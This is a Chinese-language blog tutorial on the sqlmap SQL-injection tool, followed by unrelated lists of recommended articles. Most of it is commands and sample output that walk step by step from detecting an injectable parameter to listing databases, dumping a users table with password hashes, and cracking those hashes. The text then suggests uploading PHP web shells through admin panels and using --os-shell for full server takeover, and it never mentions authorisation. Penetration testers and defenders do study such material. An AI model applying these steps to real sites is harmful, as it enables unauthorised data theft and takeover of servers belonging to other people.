---

前言

我最近在学习 sqlmap ， 我学完之后之后，觉得还是把这些都写清楚，方便 SQL map 的初学者。

一、sqlmap

Sqlmap是最流行和最强大的SQL注入自动化工具之一。给定易受攻击的http请求url，sqlmap可以利用远程数据库并进行大量黑客攻击，例如提取数据库名称，表，列，表中的所有数据等。
在某些情况下，它甚至可以在远程文件系统上读取和写入文件。用python编写，它是目前最强大的黑客工具之一。Sqlmap是SQL注入的代言。

Sqlmap包含在渗透测试Linux发行版中，如kali linux，backtrack，backbox等。在其他发行版上，只需从以下网址下载即可

http://sqlmap.org/。

由于它是用python编写的，首先你必须在你的系统上安装python。在 ubuntu 上从 synaptic 安装 python。在Windows上安装activestate python。，

在本教程中，我们将学习如何使用 SQL map 来利用易受攻击的 Web 应用程序，并看看使用这样的工具可以完成所有操作。

要理解本教程，您应该对数据库驱动的 Web 应用程序的工作原理有透彻的了解。例如那些用php+mysql制作的。

二、易受攻击的网址

假设有一个 Web 应用程序或网站包含这样的 URL

http://www.site.com/section.php?id=51

并且它很容易出现 SQL 注入，因为该站点的开发人员没有正确转义参数 ID。这可以通过尝试打开 URL 来简单地进行测试

http://www.site.com/section.php?id=51'

我们只是在参数中添加了一个单引号。如果此 URL 抛出错误或以意外方式做出反应，那么很明显数据库得到了应用程序未正确转义的意外单引号。因此，在这种情况下，此输入参数“id”容易受到SQL注入的影响。

三、使用 SQL map 进行黑客攻击

现在是时候继续使用 SQL map 来破解这些 URL 了。sqlmap 命令使用 python 解释器从终端运行。

1. 扫描远程系统

第一个命令是扫描远程系统以查看其是否容易受到 SQL 注入的影响，然后收集有关它的信息。

python sqlmap.py -u "http://www.site.com/section.php?id=51"

以上是使用 SQL map 工具运行的第一个也是最简单的命令。它检查输入参数以查找它们是否容易受到 SQL 注入的影响。为此，sqlmap 将不同类型的 SQL 注入有效负载发送到输入参数并检查输出。

[*] starting at 12:10:33
[12:10:33] [INFO] resuming back-end DBMS 'mysql'
[12:10:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: idType: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE or HAVING clausePayload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:10:37] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5

因此，sqlmap工具已经发现了操作系统，Web服务器和数据库以及版本信息。即使这么多也令人印象深刻。但是现在是时候继续前进了，看看这个工具还能做什么。

2. 发现数据库

一旦 SQL map 确认远程 URL 容易受到 SQL 注入的攻击并且可被利用，下一步就是找出远程系统上存在的数据库的名称。 “–dbs”选项用于获取数据库列表。

python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" --dbs

输出可能是这样的

[*] starting at 12:12:56
[12:12:56] [INFO] resuming back-end DBMS 'mysql'
[12:12:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: idType: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE or HAVING clausePayload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: safecosmetics
available databases [2]:
[*] information_schema
[*] safecosmetics

输出显示远程系统上的现有数据库。

3. 在特定数据库中查找表

现在是时候找出特定数据库中存在哪些表了。假设这里感兴趣的数据库是“安全化妆品”

命令：

python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D safecosmetics

输出可以类似于这样

[11:55:18] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: 'safecosmetics'
[11:55:19] [INFO] heuristics detected web page charset 'ascii'
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections
........... more tables

这不是很神奇吗？如果当然的话。现在让我们获取特定表的列。

4. 获取表的列

现在我们有了表列表，最好获取一些重要表的列。假设该表是“用户”，它包含用户名和密码。

python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T users

输出可以是这样的

[12:17:39] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)
[12:17:45] [INFO] retrieved: name
[12:17:46] [INFO] retrieved: text
[12:17:47] [INFO] retrieved: password
[12:17:48] [INFO] retrieved: text
.......
[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| email             | text         |
| hash              | varchar(128) |
| id                | int(11)      |
| name              | text         |
| password          | text         |
| permission        | tinyint(4)   |
| system_allow_only | text         |
| system_home       | text         |
+-------------------+--------------+

5. 从表中获取数据

现在是最有趣的部分，从表中提取数据。该命令将是

python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T users

上面的命令将简单地转储特定表的数据，非常类似于 my SQL dump 命令。
输出可能如下所示

+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| id | hash               | name      | email     | password | permission | system_home | system_allow_only |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| 1  | 5DIpzzDHFOwnCvPonu | admin     | <blank>   | <blank>  | 3          | <blank>     | <blank>           |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+

哈希列似乎具有密码哈希。尝试破解哈希，然后您将立即获得登录详细信息。sqlmap 将创建一个包含转储数据的 CSV 文件，以便于分析。

到目前为止，我们已经能够使用 SQL map 从远程数据库中收集大量信息。这几乎就像通过像phpmyadmin这样的客户端直接访问远程数据库一样。在真实场景中，黑客会尝试获得更高的级别来访问系统。为此，他们会尝试破解密码哈希并尝试通过管理面板登录。或者他们会尝试使用 SQL map 获取操作系统 shell。

接下来呢？

一旦您能够从易受攻击的系统扫描和收集数据，就该利用它并查看是否有可能访问该系统了。Sqlmap可以做很多事情，比如在远程系统上执行sql查询，在系统上启动远程shell等。

1. 执行任意 SQL 查询

这可能是在易受 SQL 注入影响的服务器上最容易做的事情。–SQL-query 参数可用于指定要执行的 SQL 查询。感兴趣的事情是在用户表中创建一个用户或类似的东西。或者可能是更改/修改CMS页面的内容等。

另一个参数 --SQL-shell 将提供一个类似 SQL shell 的接口来交互运行查询。

2.进入管理面板并执行

如果网站正在运行某种具有管理面板的自定义cms或类似的东西，那么只要您能够破解数据库转储中检索到的密码，就可以进入内部。简单和短长度的密码可以通过暴力破解或 google.com 破解。

检查管理面板是否允许上传某些文件。如果可以上传任意的php文件，那么它会更有趣。该php文件可以包含shell_exec，系统，exec或直通函数调用，这将允许执行任意系统命令。可以上传 php web shell 脚本来做同样的事情。

3.远程操作上的shell

这是完全接管服务器要做的事情。但是请注意，它并不像上面显示的技巧那样简单和琐碎。SQLMAP带有一个参数调用–OS-shell，可用于尝试在远程系统上获取shell，但它本身有许多限制。

根据sqlmap手册
It is possible to run arbitrary commands on the database server's underlying operating system when the back-end database management system is either MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses.
翻译：当后端数据库管理系统是MySQL，PostgreSQL或Microsoft SQL Server时，可以在数据库服务器的底层操作系统上运行任意命令，并且会话用户具有滥用数据库特定功能和体系结构弱点所需的权限

当前数据库用户所需的最重要的特权是通过数据库函数写入文件。在大多数情况下，这是不存在的。因此，这种技术在大多数情况下不起作用。

注意

1. 有时 SQL map 根本无法连接到 url。当它卡在“测试与目标 URL 的连接”的第一个任务时，这是可见的。在这种情况下，使用“–random-agent”选项很有帮助。这使得sqlmap使用有效的用户代理签名，就像Chrome或Firefox等浏览器发送的签名一样。

2. 对于不是 param=value 形式的 URL，SQL map 无法自动知道在哪里注入。例如像 http://www.site.com/class_name/method/43/80 这样的 mvc 网址。

在这种情况下，sqlmap 需要告诉用 * 标记的注入点
http://www.site.com/class_name/method/43*/80
上面会告诉 SQL map 在 * 标记的点注入

1. 当使用通过post方法提交数据的表单时，必须在“–data”选项中提供sqlmap的发布数据。

总结

以上就是今天要讲的内容，本文简单介绍了sqlmap的使用，

sqlmap详细教程相关推荐

1. 手把手从零开始搭建k8s集群超详细教程

   本教程根据B站课程云原生Java架构师的第一课K8s+Docker+KubeSphere+DevOps同步所做笔记教程 k8s集群搭建超详细教程 1. 基本环境搭建 1. 创建私有网络 2. 创建服务 ...

2. win10系统优化计算机,全面优化win10电脑系统详细教程 | 专业网吧维护

   全面优化win10电脑系统详细教程 以下针对win10系统的电脑全面优化的步骤: 步骤1:禁止开机启动项 1.首先我们先来优化开机速度,拖慢开机速度的首先是开机自启动项,Ctrl + Shift + ...

3. GPU运行Tensorflow详细教程及错误解决

   GPU运行Tensorflow详细教程及错误解决 前提条件 配置GPU运行 确认是否成功配置 出现的错误及解决方案 前提条件 最重要的一点:CUDA与tensorflow的版本一点要对应,不然用不了! ...

4. VMware虚拟机安装黑苹果MacOS Mojave系统详细教程

   更多资源请百度搜索:前端资源网 欢迎关注我的博客:www.w3h5.com 最近遇到一个H5页面的 iPhone X 刘海兼容问题.查到一个 XCode 编辑器,可以模拟 iPhone X 环境运行. ...

5. [分享] 从定制Win7母盘到封装详细教程 By BILL （ 10月23日补充说明 ）

   [分享] 从定制Win7母盘到封装详细教程 By BILL ( 10月23日补充说明 ) billcheung 发表于 2011-10-23 00:07:49 https://www.itsk.com ...

6. win七系统如何卸载MySQL_win7系统卸载SQL2008R2数据库的详细教程

   用过SQL2008R2数据库的朋友都知道,安装起来容易卸起来麻烦,可是在win7 32位旗舰版系统就不知道怎么卸载SQL2008R2数据库了.其实卸载SQL2008R2数据库的方法也很简单,可直接通过 ...

7. Ubuntu系统安装搜狗输入法详细教程

   Ubuntu16.04系统安装搜狗输入法详细教程 解决Ubuntu 18.04中文输入法的问题,安装搜狗拼音

8. PHP7Grafika,PHP图片处理库Grafika详细教程（3）：图像属性处理

   该文章是接着上篇文章,<PHP极其强大的图片处理库Grafika详细教程(2):图像特效处理模块>,由于grafika功能太多,所以分开写,其他的点击这里 该文章主要写grafika的图像 ...

9. mysql.msi卸载_MySql安装与卸载的详细教程

   本文为大家分享了MySql安装与卸载的教程,供大家参考,具体内容如下 一.MYSQL的安装 1.打开下载的mysql安装文件,双击运行mysql-5.5.40-win32.msi. 2.选择安装类型, ...

最新文章

1. this指向undefined uiapp_JavaScript深入之史上最全5种this绑定全面解析
2. github pages markdown_排版利器——MarkDown入门简介
3. 查找Linux中内存和CPU使用率最高的进程
4. SAP UI5应用和Hybris Commerce的国际化(internationalization)支持
5. [蓝桥杯][算法提高VIP]贪吃的大嘴（多重背包）
6. 洛谷——P1720 月落乌啼算钱（斐波那契数列）
7. python中rect函数_Rect和RectF函数
8. C#学习笔记之线程安全
9. 波士顿大学 计算机专业,波士顿大学本科计算机专业课程设置是怎样的？
10. Kaggle案例精选——电信客户流失预测（Telecom Customer Churn Prediction）Part One：数据说明；数据导入、处理；数据总览；描述性分析
11. 2018年视频云服务市场格局进入整合阶段，阿里云视频云位居市场竞争力领导者的位置
12. 海思HI3751_HMS开发指南
13. 【3D视觉创新应用竞赛作品系列​】基于嵌入式的室内静态场景实时重建系统
14. MySQL的基本用法
15. 青帮大佬杜月笙的另一面及其后代现状
16. pdcp层的作用_NR PDCP层介绍
17. html 实现自动填表
18. iPhone Plus手机的分辨率到底是多少，是1080×1920还是1242×2208？
19. 更靠近明媚阳光的日子里
20. 【Linux】Linux文件目录

热门文章

1. 银粉和薄片行业调研报告 - 市场现状分析与发展前景预测
2. VS添加动态链接库的两种方法
3. python蚂蚁森林
4. 龙世界java游戏_我的世界：当Notch在6年后重回mc，会发生什么？萌新的像个弟弟...
5. 玩转软件|简单分析好用的图文转视频工具——一帧秒创
6. 绿标域名和普通域名有什么区别?
7. python编程实现文本分词_Python:徒手创建分词函数
8. python中from import*的*什么意思_[Python]Python中的import和from import
9. 计算机思维在体育领域的贡献,终身成长 | 思维带来的差距如何在体育界中体现出来...
10. Color Font - 使用颜色和字体